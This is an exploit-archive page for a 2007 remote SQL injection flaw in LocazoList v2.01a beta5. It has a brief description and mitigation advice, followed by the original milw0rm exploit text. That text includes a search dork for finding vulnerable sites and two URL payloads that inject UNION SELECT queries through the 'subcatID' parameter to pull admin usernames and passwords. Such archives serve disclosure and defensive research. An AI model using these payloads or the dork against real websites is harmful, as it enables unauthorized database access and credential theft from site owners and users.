LocazoList - exploit.company

vendor:

LocazoList

by:

ajann

N/A

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: LocazoList

Affected Version From: v2.01a beta5

Affected Version To: v2.01a beta5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

LocazoList <= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability

The LocazoList version v2.01a beta5 is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by manipulating the 'subcatID' parameter in the 'main.asp' file. By injecting malicious SQL queries, the attacker can retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with security patches and following secure coding practices can help prevent such vulnerabilities.

Source

Exploit-DB raw data:

*************************************************************************************
# Title   :  LocazoList <= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.locazo.net:81
# Dork    :  "Powered by Locazolist Copyright © 2006"
# $$      :  $100

*************************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//main.asp?catid=1&subcatID=[SQL]

Example:

//main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201
//main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-03]